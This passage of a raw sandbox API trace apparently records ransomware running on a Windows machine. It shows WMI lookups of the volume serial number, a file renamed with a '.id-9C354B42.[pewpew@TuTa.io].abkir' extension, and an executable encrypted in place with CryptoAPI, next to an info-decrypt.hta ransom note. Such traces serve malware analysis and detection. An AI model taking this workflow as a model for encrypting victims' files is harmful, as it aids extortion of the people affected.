0x3 [0169.519] WbemLocator:IUnknown:Release (This=0x66b28bc) returned 0x2 [0169.519] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea30*=0x0, pszText=0x0 | out: puBuffLength=0x949ea30*=0x20, pszText=0x0) returned 0x0 [0169.519] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x949ea30*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea30*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0169.519] IWbemServices:GetObject (in: This=0x60332c4, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949e9e4*=0x0, ppCallResult=0x0 | out: ppObject=0x949e9e4*=0x6028b10, ppCallResult=0x0) returned 0x0 [0169.537] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x949e9e4 | out: puCount=0x949e9e4*=0x2) returned 0x0 [0169.537] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=4, puBuffLength=0x949e9e0*=0x0, pszText=0x0 | out: puBuffLength=0x949e9e0*=0xf, pszText=0x0) returned 0x0 [0169.537] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=4, puBuffLength=0x949e9e0*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9e0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0169.537] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x373d424*=0, plFlavor=0x373d428*=0 | out: pVal=0x949e9e0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x373d424*=8, plFlavor=0x373d428*=0) returned 0x0 [0169.537] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.537] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.537] IWbemClassObject:Get (in: This=0x6028b10, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949e9e8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x373d424*=8, plFlavor=0x373d428*=0 | out: pVal=0x949e9e8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x373d424*=8, plFlavor=0x373d428*=0) returned 0x0 [0169.537] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.537] SysStringByteLen (bstr="9C354B42") returned 0x10 [0169.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest", lpFilePart=0x0) returned 0xab [0169.537] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e5e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0xce [0169.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea48) returned 1 [0169.538] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), fInfoLevelId=0x0, lpFileInformation=0x949eac4 | out: lpFileInformation=0x949eac4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1fba2400, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0169.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea44) returned 1 [0169.538] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\clickonce_bootstrap_unsigned.manifest.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0170.477] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0x9b [0170.477] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta", lpFilePart=0x0) returned 0x96 [0170.477] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea68) returned 1 [0170.477] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949eae4 | out: lpFileInformation=0x949eae4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ba065a0, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x1ba065a0, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x1ba065a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0170.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea64) returned 1 [0170.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e608, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0x9b [0170.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eab4) returned 1 [0170.478] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), fInfoLevelId=0x0, lpFileInformation=0x36e1c1c | out: lpFileInformation=0x36e1c1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a37a2c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a37a2c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1a9a8e60, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0170.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab0) returned 1 [0170.478] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e4f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0x9b [0170.478] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9e8) returned 1 [0170.478] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x320 [0170.478] GetFileType (hFile=0x320) returned 0x1 [0170.478] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9e4) returned 1 [0170.479] GetFileType (hFile=0x320) returned 0x1 [0170.479] GetFileSize (in: hFile=0x320, lpFileSizeHigh=0x949eaf0 | out: lpFileSizeHigh=0x949eaf0*=0x0) returned 0x20 [0170.479] ReadFile (in: hFile=0x320, lpBuffer=0x36e1fd0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949ea9c, lpOverlapped=0x0 | out: lpBuffer=0x36e1fd0*, lpNumberOfBytesRead=0x949ea9c*=0x20, lpOverlapped=0x0) returned 1 [0170.480] CloseHandle (hObject=0x320) returned 1 [0170.480] CryptAcquireContextW (in: phProv=0x949ea3c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949ea3c*=0x66ba630) returned 1 [0170.481] CryptGenRandom (in: hProv=0x66ba630, dwLen=0x10, pbBuffer=0x36e3694 | out: pbBuffer=0x36e3694) returned 1 [0171.019] CryptImportKey (in: hProv=0x66ba630, pbData=0x3a5efd0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949ea0c | out: phKey=0x949ea0c*=0xb7f650) returned 1 [0171.019] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0171.019] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0171.019] CryptDuplicateKey (in: hKey=0xb7f650, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e9fc | out: phKey=0x949e9fc*=0xb7f3d0) returned 1 [0171.019] CryptContextAddRef (hProv=0x66ba630, pdwReserved=0x0, dwFlags=0x0) returned 1 [0171.019] CryptSetKeyParam (hKey=0xb7f3d0, dwParam=0x4, pbData=0x3a5f0b0*=0x1, dwFlags=0x0) returned 1 [0171.019] CryptSetKeyParam (hKey=0xb7f3d0, dwParam=0x1, pbData=0x3a5f07c, dwFlags=0x0) returned 1 [0171.019] CryptEncrypt (in: hKey=0xb7f3d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a5f0c0*, pdwDataLen=0x949ea68*=0x30, dwBufLen=0x30 | out: pbData=0x3a5f0c0*, pdwDataLen=0x949ea68*=0x30) returned 1 [0171.019] CryptEncrypt (in: hKey=0xb7f3d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3a5f114*, pdwDataLen=0x949ea70*=0x0, dwBufLen=0x10 | out: pbData=0x3a5f114*, pdwDataLen=0x949ea70*=0x10) returned 1 [0171.021] CryptDestroyKey (hKey=0xb7f650) returned 1 [0171.021] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0171.021] CryptReleaseContext (hProv=0x66ba630, dwFlags=0x0) returned 1 [0171.021] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", nBufferLength=0x105, lpBuffer=0x949e4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe", lpFilePart=0x0) returned 0x9b [0171.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9d4) returned 1 [0171.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Apps\\2.0\\DQQ19BCJ.JAX\\YVORLGOR.PNT\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\GoogleUpdateSetup.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\apps\\2.0\\dqq19bcj.jax\\yvorlgor.pnt\\goog...app_baa8013a79450f71_0001.0003_290679d077f4cfec\\googleupdatesetup.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x5a0 [0171.022] GetFileType (hFile=0x5a0) returned 0x1 [0171.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9d0) returned 1 [0171.022] GetFileType (hFile=0x5a0) returned 0x1 [0171.022] WriteFile (in: hFile=0x5a0, lpBuffer=0x3a5f7f4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949ea64, lpOverlapped=0x0 | out: lpBuffer=0x3a5f7f4*, lpNumberOfBytesWritten=0x949ea64*=0x20, lpOverlapped=0x0) returned 1 [0171.023] CloseHandle (hObject=0x5a0) returned 1 [0171.023] CoTaskMemAlloc (cb=0x20c) returned 0xbd7ce8 [0171.023] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbd7ce8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0171.024] CoTaskMemFree (pv=0xbd7ce8) [0171.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0171.024] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949ea10 | out: ppv=0x949ea10*=0xb51e34) returned 0x0 [0171.024] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949ea08 | out: pAptType=0x949ea08*=1) returned 0x0 [0171.024] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949ea0c | out: ppvObject=0x949ea0c*=0x0) returned 0x80004002 [0171.024] IUnknown:Release (This=0xb51e34) returned 0x1 [0171.025] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e378 | out: ppv=0x949e378*=0x6027780) returned 0x0 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027780, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e590 | out: ppvObject=0x949e590*=0x0) returned 0x80004002 [0171.025] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027780, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e5a4 | out: ppvObject=0x949e5a4*=0x6030e80) returned 0x0 [0171.025] WbemDefPath:IUnknown:Release (This=0x6027780) returned 0x0 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e1c4 | out: ppvObject=0x949e1c4*=0x6030e80) returned 0x0 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e180 | out: ppvObject=0x949e180*=0x0) returned 0x80004002 [0171.025] WbemDefPath:IUnknown:AddRef (This=0x6030e80) returned 0x3 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949dadc | out: ppvObject=0x949dadc*=0x0) returned 0x80004002 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949da8c | out: ppvObject=0x949da8c*=0x0) returned 0x80004002 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949da98 | out: ppvObject=0x949da98*=0xbdf040) returned 0x0 [0171.025] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf040, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949daa0 | out: pCid=0x949daa0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0171.025] WbemDefPath:IUnknown:Release (This=0xbdf040) returned 0x3 [0171.025] CoGetContextToken (in: pToken=0x949daf8 | out: pToken=0x949daf8) returned 0x0 [0171.025] CoGetContextToken (in: pToken=0x949df00 | out: pToken=0x949df00) returned 0x0 [0171.025] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949df90 | out: ppvObject=0x949df90*=0x0) returned 0x80004002 [0171.026] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x2 [0171.026] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x1 [0171.026] CoGetContextToken (in: pToken=0x949e888 | out: pToken=0x949e888) returned 0x0 [0171.026] CoGetContextToken (in: pToken=0x949e7e8 | out: pToken=0x949e7e8) returned 0x0 [0171.026] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030e80, riid=0x949e8b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e8b4 | out: ppvObject=0x949e8b4*=0x6030e80) returned 0x0 [0171.026] WbemDefPath:IUnknown:AddRef (This=0x6030e80) returned 0x3 [0171.026] WbemDefPath:IUnknown:Release (This=0x6030e80) returned 0x2 [0171.026] WbemDefPath:IWbemPath:SetText (This=0x6030e80, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=2, puBuffLength=0x949ea38*=0x0, pszText=0x0 | out: puBuffLength=0x949ea38*=0x20, pszText=0x0) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetText (in: This=0x6030e80, lFlags=2, puBuffLength=0x949ea38*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ea38*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030e80, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949ea3c | out: puCount=0x949ea3c*=0x0) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030e80, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030e80, uRequestedInfo=0x0, puResponse=0x949ea44 | out: puResponse=0x949ea44*=0xc19) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030e80, puCount=0x949e9bc | out: puCount=0x949e9bc*=0x0) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x949e9a8 | out: puCount=0x949e9a8*=0x2) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0x0, pszText=0x0 | out: puBuffLength=0x949e9a4*=0xf, pszText=0x0) returned 0x0 [0171.026] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x949e9a4*=0xf, pszText="00000000000000" | out: puBuffLength=0x949e9a4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0171.026] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e958 | out: ppv=0x949e958*=0xb51e34) returned 0x0 [0171.027] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e950 | out: pAptType=0x949e950*=1) returned 0x0 [0171.027] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x0) returned 0x80004002 [0171.027] IUnknown:Release (This=0xb51e34) returned 0x1 [0171.027] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e2c0 | out: ppv=0x949e2c0*=0x60277a0) returned 0x0 [0171.027] WbemDefPath:IUnknown:QueryInterface (in: This=0x60277a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e4d8 | out: ppvObject=0x949e4d8*=0x0) returned 0x80004002 [0171.027] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60277a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4ec | out: ppvObject=0x949e4ec*=0x6030ef0) returned 0x0 [0171.027] WbemDefPath:IUnknown:Release (This=0x60277a0) returned 0x0 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e10c | out: ppvObject=0x949e10c*=0x6030ef0) returned 0x0 [0171.028] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030ef0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, 